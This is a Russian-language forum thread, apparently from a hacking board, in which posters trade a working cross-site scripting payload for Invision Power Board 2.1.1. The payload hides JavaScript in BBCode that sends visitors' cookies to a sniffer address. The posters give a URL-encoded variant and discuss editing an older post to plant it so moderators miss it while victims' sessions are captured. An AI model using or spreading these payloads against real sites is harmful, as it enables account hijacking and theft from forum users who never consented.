Вопрос по эксплойту для Ipb 2.1.1.

Помог такой код:

HTML:

[EMAIL][email protected][URL=wj/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]

Вопрос: А как закодировать в такие вот коды сниффер http://s.netsec.ru/sec/pic.gif

Имеется в виду символы адреса в код

 

Code:

%5BEMAIL%[email protected]%5BURL%3Dwj/style%3Dbackground%3Aurl%28javascript%3Adocument.images%5B1%5D.src%3D%22http%3A//s.netsec.ru/sec/pic.gif%3F%22document.cookie%29%3B%20%5D%5B/URL%5D%5B/EMAIL%5D

На вот так вроде!

 

Можеш тут _http://webmastertools.narod.ru/OnlineTools/url_decode.html , поменяй сылку на снифер _http://antichat.ru/cgi-bin/s.jpg на http://s.netsec.ru/sec/pic.gif , и кодируй.

 

А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно

 

Ты получаешь куки только с той страницы на которой отображается твоё сообщение. Сомневаюсь что многие будут листать топик назад и читать, допустим вторую его страницу, а не последнии сообщения, допустим на десятой.

 

Это понятно - это будет работать? - или нужно обязательно создавать новый пост?

 

Будет, при условии что оно отобразится на страничке у жертвы.

 

Эт я к вопросам по поводу того, что текст кода виден из других браузеров - и админ удаляет посты. Ведб это выход - запостится, подождать пока накопятся сообщения, и пока не совершился переход на следующую страницу - изменить свой первый пост вставив туда код. Пару, тройку юзеров можно поймать вот таким образом

 

Нет это не правильно, прочти http://forum.antichat.ru/showthread.php?t=11807 Я дал пример как это можно реальзивать. ` тут СОВСЕМ не причем!